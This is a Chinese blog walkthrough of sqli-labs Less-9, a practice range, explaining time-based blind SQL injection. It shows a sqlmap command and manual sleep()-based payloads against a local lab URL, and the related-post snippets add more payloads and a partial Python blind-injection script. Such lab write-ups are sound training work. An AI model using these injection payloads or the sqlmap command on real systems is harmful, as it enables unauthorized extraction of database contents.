​Sqli-labs靶场第9关详解[Sqli-labs-less-9]

已于 2024-03-02 20:12:21 修改
阅读量1.6k 收藏 23
点赞数 22
分类专栏: sqli-labs 文章标签: 数据库
于 2024-02-24 14:10:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/136271040
版权
Sqli-labs-Less-9
前言:
SQL注入的三个条件:
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)

利用 order by 来测列数

    测显位:mysql用1,2,3,4

 Mysql获取相关数据:

    一、数据库版本-看是否认符合information_schema查询-version()
    二、数据库用户-看是否符合root型注入攻击-user()
    三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
    四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()

SQL注入-时间型盲注(Time-based blind)

sqlmap 会替换或者添加相关的 SQL 语句到 HTTP 请求的查询参数里面,相关的 SQL 语句可能是合法的、用于使后端 DBMS(Database Management System,数据库管理系统)延迟几秒响应的查询。针对每一个注入检测的 HTTP 响应,通过对 HTTP 响应时间与原始请求之间进行比较,从而逐个字符地推导出注入语句的输出。正如基于布尔型盲注的技术一样,二分算法也会被应用。

 #自动化注入-SQLmap工具注入

 SQLmap用户手册:文档介绍 - sqlmap 用户手册
python sqlmap.py -u http://192.168.0.7:802/sqli-labs/Less-9/?id=1 --users

 爆DBMS所有用户为:

成功利用漏洞!!!

#手工注入

1.根据提示id传参/?id=1,显示You are in...........

?id=0  显示You are in...........

?id=1231234  也显示You are in...........

?id=1'   ?id=1"  ?id=1')  ?id=1")   仍显示You are in...........

初步判断,上传id值后无论id值为多少,最终回显的都是You are in...........

如果是这样,那么   联合注入/报错注入/布尔型注入  这些注入方式在这题行不通

尝试  时间注入

当?id=1 and if(1=1,sleep(5),1) --+  时,反应正常,说明存在闭合

当?id=1' and if(1=1,sleep(5),1) --+ 时,反应变慢,说明 闭合 为 单引号 '

时间注入他人相关文章参考:Web安全原理剖析(五)——时间注入攻击-CSDN博客

成功利用漏洞!!!

「已注销」
关注
  • 22
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs 9~15
eleven_77_的博客
11-14 159
Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注) 不管怎么输入,回显总是you are … 查看源码可知不管你怎么输入,输出结果都是You are in ,这就必须通过时间来判断了 于是考虑时间型盲注,payload ?id=1’ and sleep(3) --+ 此时发现明显延迟,说明注入成功,接着我们进行爆破即可 爆库payload ?id=1’ and if(length(database())=4 , sleep(3
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
最新发布
Superstacks超全栈
06-09 487
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
详细sqli-labs(1-20)通讲解
m0_57928318的博客
05-18 1287
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli靶场之less9
sunxueer的博客
07-19 1229
sqli less9 时间盲注 结合burpsuite 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。 1. 求闭合字符 id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了 查看源码,证实了猜测,尝试使用时间盲注 id=1 and sleep(5) //未延迟 i
sqli-labs靶场Less-9
songling515010475的专栏
08-25 153
1、访问首页,/Less-9/index.php?id=1,这里的传参点是id 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 http://192.168.60.142:8080/sqlilabs/Less-9/index.php?id=1 ' and sleep(10)-- qwe 分析:通过测试,这里是通过单引号闭合,同时使用延时注入才生效,哪么在以后SQL注入探测时,当前面5.
[sql注入]时间盲注模板+sqli靶场less-9
qq_37301470的博客
11-13 446
less-9 观察页面只有一个返回值You are in… 即使值为错也没有返回 因此采用时间盲注 import requests import string import time ip="http://a86ecc66-5929-4b0d-b39c-842de53f0121.node4.buuoj.cn/Less-9/?id=" command="database()" result="" for i in range(1,100): for j in string.ascii_letters:
sqli-labs (less-9)
kukudeshuo的博客
03-08 1379
sqli-labs (less-9) 补充知识 本将介绍与Boolean盲注非常相似的另一种注入方法——时间盲注。他与Boolean盲注的不同之处在于,时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则IF()的返回值为expr2;否则返回值则为expr3。 例: if (length(database())>1,1,sleep(5)),这句语句的意思是查
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
02-12
sqli-labs靶场
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs 9
qq_55777983的博客
07-29 390
less -9 很快啊,我们来到了第9题 掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数 所以也叫延时注入 我们惊讶的发现原本应该报错的?id=1’都是这样的回显 尝试了很多只会回显 显然这题使得布尔型盲注都无法使用 所以我们使用延时注入来判断语句的对错 ?id=1’ and sleep(5) --+ 我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒 由于我们的1’成功闭合前面–+又注释了后面 而and连接了前面正确的语句所以执行了后
SQL注入之sqli-labs(九)
m0_60716947的博客
04-30 317
目录 (九)第五十四到六十五 (1)第五十四 (2)第五十五 (3)第五十六 (4)第五十七 (5)第五十八 (6)第五十九 (7)第六十 (8)第六十一 (9)第六十二 (10)第六十三 (11)第六十四 (12)第六十五 (十)sqli-labs 总结 (九)第五十四到六十五 (1)第五十四 首页提醒我们使用id 值进行注入,并且告诉我们: 此挑战的目标是在少于 10 次尝试的情况下仅从数据库随机表中转储(“挑战”)的(密钥) 为
sqli-labs第九
qq_56726035的博客
04-08 688
sqli-labs第九
sqli-labs:第九
J_linnb的博客
05-03 1012
【代码】sqli-labs:第九
sqli-labs卡9(基于get提交的单引号闭合的时间盲注)通思路
zyh1588的博客
10-31 602
小白回顾sqli-labs靶场第九(时间盲注)
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,解析底层原理
2401_84433486的博客
04-17 783
测得第一列的名称的第一个字符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。(img-qkVA1lLi-1713365620107)]测得第一个表名的第一位是“e”,递推下去得到表名:emails。止,不再深入研究,那么很难做到真正的技术提升。下面尝试注users表。
SQLI-labs-第九和第十
weixin_54055099的博客
04-14 792
sqlilab 第9和第10,时间盲注
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值